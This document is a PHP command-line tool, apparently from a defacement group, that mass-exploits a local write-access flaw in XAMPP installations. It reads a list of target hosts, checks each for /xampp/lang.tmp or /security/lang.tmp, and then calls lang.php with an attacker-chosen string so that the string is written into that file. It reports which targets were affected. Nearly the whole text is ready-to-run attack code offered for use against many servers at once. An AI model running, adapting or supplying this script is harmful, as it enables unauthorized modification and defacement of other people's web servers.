[CLI] Mass Exploiter XAMPP Local Write Access

1. <?php
2. /*
3. coded by ShinChan - N45HT | 15/12/2017
4. */
5. echo "
6.  ___  _  _  __  _  _  __  _  _   __   _  _     _    _  ____  ___
7. / __)( )( )(  )( \( )/ _)( )( ) (  ) ( \( )   ( \/\/ )(_  _)(  _)
8. \__ \ )__(  )(  )  (( (_  )__(  /__\  )  (  ___\    /   )(   ) _)
9. (___/(_)(_)(__)(_)\_)\__)(_)(_)(_)(_)(_)\_)(___)\/\/   (__) (_)  
10.   XAMPP Local Write Access Auto Exploiter - coded by ShinChan
11.  
12. ";
13.  
14. echo "Input your target list: ";
15. $list = trim(fgets(STDIN));
16. echo "Input your quote : ";
17. $quote0 = htmlspecialchars(str_replace(" ","_",(trim(fgets(STDIN)))));
18. $quote1 = str_replace(">","_",$quote0);
19. $quote2 = str_replace("<","_",$quote1);
20. $quote3 = str_replace("&gt;","_",$quote2);
21. $pwn = str_replace("&lt;","_",$quote3);
22.  
23. $open = fopen("$list","r");
24. $size = filesize("$list");
25. $read = fread($open,$size);
26. $lists = explode("\r\n",$read);
27.  
28. echo "\n";
29.  
30. foreach($lists as $target){
31.     if(!preg_match("/^http:\/\//",$target) AND !preg_match("/^https:\/\//",$target)){
32.         $targets = "http://$target";
33.     }else{
34.         $targets = $target;
35.     }
36.    
37.     echo "Target => $targets\n";
38.     echo "  [*] Checking Path : ";
39.    
40.     $chx = curl_init("$targets/xampp/lang.tmp");
41.     curl_setopt($chx, CURLOPT_FOLLOWLOCATION, 1);
42.     curl_setopt($chx, CURLOPT_RETURNTRANSFER, 1);
43.     curl_exec($chx);
44.     $httpcodex = curl_getinfo($chx, CURLINFO_HTTP_CODE);
45.     curl_close($chx);
46.                    
47.     $chs = curl_init("$targets/security/lang.tmp");
48.     curl_setopt($chs, CURLOPT_FOLLOWLOCATION, 1);
49.     curl_setopt($chs, CURLOPT_RETURNTRANSFER, 1);
50.     curl_exec($chs);
51.     $httpcodes = curl_getinfo($chs, CURLINFO_HTTP_CODE);
52.     curl_close($chs);
53.  
54.     if($httpcodex == 200){
55.         echo "/xampp/lang.tmp => OK\n";
56.         echo "  [*] Exploiting Target : ";
57.         $ck = curl_init("$targets/xampp/lang.php?$pwn");
58.         curl_setopt($ck, CURLOPT_FOLLOWLOCATION, 1);
59.         curl_setopt($ck, CURLOPT_RETURNTRANSFER, 1);
60.         $cka = curl_exec($ck);
61.         if($cka){
62.             echo "OK\n";
63.             echo "  [*] Result : ";
64.             $ch = curl_init("$targets/xampp/lang.tmp");
65.             curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
66.             curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
67.             $cek = curl_exec($ch);
68.             if(preg_match("/$pwn/",$cek)){
69.                 echo "$targets/xampp/lang.tmp\n\n";
70.             }else{
71.                 echo "$targets/xampp/lang.tmp\n\n";
72.             }
73.             curl_close($ch);
74.         }else{
75.             echo "Failed\n\n";
76.         }
77.     }else if($httpcodes == 200){
78.         echo "/security/lang.tmp => OK\n";
79.         echo "  [*] Exploiting Target : ";
80.         $ck = curl_init("$targets/security/lang.php?$pwn");
81.         curl_setopt($ck, CURLOPT_FOLLOWLOCATION, 1);
82.         curl_setopt($ck, CURLOPT_RETURNTRANSFER, 1);
83.         $cka = curl_exec($ck);
84.         if($cka){
85.             echo "OK\n";
86.             echo "  [*] Result : ";
87.             $ch = curl_init("$targets/security/lang.tmp");
88.             curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
89.             curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
90.             $cek = curl_exec($ch);
91.             if(preg_match("/$pwn/",$cek)){
92.                 echo "$targets/security/lang.tmp\n\n";
93.             }else{
94.                 echo "$targets/security/lang.tmp\n\n";
95.             }
96.             curl_close($ch);
97.         }else{
98.             echo "Failed\n";
99.         }
100.     }else{
101.         echo "Not Vuln\n\n";
102.     }
103. }